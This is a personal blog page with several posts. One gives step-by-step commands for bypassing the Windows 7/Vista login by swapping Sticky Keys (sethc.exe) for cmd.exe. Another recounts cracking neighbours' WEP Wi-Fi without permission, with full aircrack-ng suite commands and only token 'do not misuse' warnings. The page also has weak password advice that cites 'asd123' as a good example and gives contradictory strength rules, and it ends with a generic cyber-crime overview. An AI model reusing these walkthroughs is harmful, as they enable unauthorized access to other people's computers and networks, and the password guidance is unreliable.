Binod's Blog

How to Reset Windows 7 or Vista Password(Helpful when you forgot your Computer’s Password)

If somehow you have forgotten your windows password and are looking for way around to login back into your computer then you won’t have to worry.There are many methods are available for resetting password of your windows 7 or vista.But many of them are lengthy or sophisticated.This is one of the simplest method and you only need a windows installation CD/USB to reset the password.It relies on an unpatched bug in windows operating system.
Follow the Following steps:

Insert windows 7 disk into your CD Rom and Restart your computer.

Press any key to Boot from the CD and then click on Repair your Computer.

Now from the various options select Command Prompt.

Now Command Prompt will be open and create a backup of Sticky keys by typing the following command in the command prompt

copy c:\windows\system32\sethc.exe c:\

Now replace sticky keys with the Command Prompt by typing the following command

copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Now Restart your computer.
When you get the windows login screen then hit Shift button for 5 times continuously and Administrative Mode of Command Prompt will be open.

Now to reset the password just type the following command in the command prompt

net user binod Password

Remember: binod is the username of the computer and Password is the password. Replace both as you wish.

Login in your computer system with your new Username and Password.

Now every time when you press Shift key for 5 times then command prompt will be open instead of Sticky keys. To get back these Sticky keys repeat first three steps and then in the command prompt window type the following command.

copy c:\sethc.exe c:\windows\system32\sethc.exe

Sharing the Experience of Wireless Network Hacking.

I do not have any internet connection still i am online, posting my blogs, doing my online activities on facebook, checking my email and replying back. My friends wonder how?? My answer is “There are lot of WIRELESS Signals passing through my room across my laptop so I HACKED them, But I Never Try to harm and destroy those signals.” I always believe in “HACKING FOR A GOOD REASON”

Once I was in my room all alone, nothing to do. Clicking here and there, refreshing the desktop multiple times, accidentally i got to click the wireless icon. OMG there were more than 10 Networks and among them few were showing a full signal. I tried to connect them but all were password protected. I wonder how can i get access to them and use internet. Then i started searching through my Snail like connection of UTL.

Before saying the steps of wireless hacking i would like to say “PLEASE DO NOT MISUSE THIS KNOWLEDGE”, because everything, every machine, and every step is traceable in networking/internet world. This is not a smartness of a Hacker rather than it’s the mistake of a network administrator to keep the security type to WEP (Wireless Equivalent Privacy).

Now let me Enter to the Steps I followed:

STEP 1) SEARCH and LEARN HOW SYSTEM WORKS:
a) http://www.bing.com: [search keyword: wireless hacking, how to hack wireless network, wireless hacking videos, wireless hacking software’s]

I find out the way I can hack is to capture all the packets that are moving to the router and dig the passkey out of those data packets. And the most easily to hack was WEP (Wireless Equivalent Privacy).

STEP 2) Collection of Necessary Software’s:

For that I need a BACKTRACK. Go to http://backtrack-linux.org website and in the download tab download the file named backtrack4.iso. or start searching for backtrack4 torrent file.

STEP 3) Start The Hacking Journey:

1)      Burn the (iso) file in to a DVD and restart your computer. Or make your pen drive bootable with backtrack 4.

2)      Boot your computer through DVD /Pen drive and type “startx” and enter when you see a blue command in the console.

3)      Wait for the Interface to start.

4)      When you have the Interface started go to the console and type “/etc/init.d/networking start”

5)      Now Check the name of Wireless Card type of your PC “airmon-ng” [ Wireless card Name: wlan0 ]

6)      Now type “airmon-ng stop wlan0 [Wireless Card Name]” (which you have noted).

7)      Now Configure the wireless card in monitor mode type “airmon-ng start wlan0 [Wireless Card Name]” (which you have noted).

8)      NOW TYPE

• airmon-ng
• airodump-ng wlan0 [Wireless Card Name]” (which you have noted)
• NOTE DOWN: BSSID, ESSID, Channel Number
• CTRL+C

9)      Now type “airodump-ng -w wep -c 6[channel number] –bssid [BSSID] wlan0 [wireless card name].

10)  Open a new Console.

11)  Type “aireplay-ng -1 0 –a [BSSID] wlan0[wireless card name].

12)  Open a new Console.

13)  Type “aireplay-ng -3 -b [BSSID] wlan0 [wireless card name]”.

14)  Go to the first console (1). You will see that you have started sending and receiving data from the wireless network, when the data packets reach 30,000.

15)  Type:

• Ctrl + C
• dir

Locate a file name with extension .cap

16)  Now aircrack-ng [filename][.cap]

FINALLY you will see in screen

Testing Keys

KEY FOUND as “98:00:01:00:11” [Your pass key is “9800010011”]

Restart your computer and eject the DVD and login to your OS and type the WEP key and get the access to the wireless network.

At last Again I say “DO NOT USE IT FOR A BAD REASON” U WILL BE TRACED OUT.

A password is an unspaced sequence of characters used to determine that a computer user requesting access to a computer system is really that particular user. Typically, users of a multi user or securely protected single-user system claim a unique name (often called a user ID) that can be generally known. In order to verify that someone entering that user ID really is that person, a second identification, the password, known only to that person and to the system itself, is entered by the user. A password is typically somewhere between four and 16 characters, depending on how the computer system is set up. When a password is entered, the computer system is careful not to display the characters on the display screen, in case others might see it.

Good criteria when choosing a password or setting up password guidelines include the following:

• Don’t pick a password that someone can easily guess if they know who you are (for example, not your Mobile Number, birthday, or middle name, Fathers Name, Boyfriends Name)
• Don’t pick a word that can be found in the dictionary (since there are programs that can rapidly try every word in the dictionary!)
• Don’t pick a word that is currently newsworthy
• Don’t pick a password that is similar to your previous password

• Do pick a mixture of letters and at least one number. [eg: asd123]
• Do pick a word that you can easily remember also add some number and special character [eg: abc123&&&]
• At least 6 characters.
• Do not put same as your username

HOw Does The Password Meter Checks

• Unacceptable - less than 6 characters
• Weak - 5 or more Characters, including 1 or more Numerics
• Fair - 5 or more Characters  including:
  • 1 Numeric, and
  • 1 or more Special characters, or
  • 1 or more Uppercase Characters
• Strong - 5 or more characters including:
  • 2 or more Numerics, and
  • 1 or more Special Characters, or
  • 1 or more Uppercase characters
• Very Secure – 5 or more characters including:
  • 2 or more Numerics, and
  • 1 or more Special Characters, and
  • 1 or more uppercase characters

Strong Password Example:

• n0tDogsN@m3
• (heLL0)(125)

If u liked this post do share it with ur friends.

Cyber crimes are generally defined as any type of illegal activity that makes use of the Internet, a private or public network, or an in-house computer system. While many forms of cyber crime revolve around the appropriation of proprietary information for unauthorized use, other examples are focused more on an invasion of privacy. As a growing problem around the world, many countries are beginning to implement laws and other regulatory mechanisms in an attempt to minimize the incidence of cyber crime.

Sometimes referred to as electronic crime, one of the most prolific examples involves utilizing a computer connection and specially developed software in order to steal identities, credit card numbers, or other data that the criminal can use to his or her advantage. Using illegally obtained data, the criminal can open accounts, charge a wide range of goods and services, and then abandon the accounts. This leaves the victim in the position of having to deal with huge debts that he or she did not generate.

Blackmail is a long-established illegal act that has been given a new twist in the modern age. The blackmailer may threaten to release embarrassing or other harmful information via the Internet or a private network if the victim does not comply with the demands of the criminal. A cyber crime of this type may go as far as having the victim transfer funds to an untraceable bank account using some type of online payment program, thus making full use of modern technology to commit the crime.

Cyber crime can also involve illegal access to company information. Just as with individuals, criminals can steal financial information and make purchases using the data. The criminal may also withdraw funds from company reserves, transferring the stolen funds through a variety of accounts and making it virtually impossible to locate the stolen assets. In other cases, it is not money or credit information the criminal seeks; obtaining proprietary client information and selling it to competitors is another example of this type of high tech criminal activity.

In many countries around the world, nations have passed cyber crime law packages that make the issuance of spam a criminal act. Spam is loosely defined as unsolicited emails that are simultaneously sent to thousands or even millions of email accounts. Some nations have enacted specific conditions that must apply in order for the spam to not be considered a cyber crime, such as providing a means for the recipient to opt out of receiving further email solicitations from the sender. As the problem grows, more politicians promote the idea of some sort of national or international cyber crime act that would specifically address the use of spam and either limit or eliminate the practice altogether.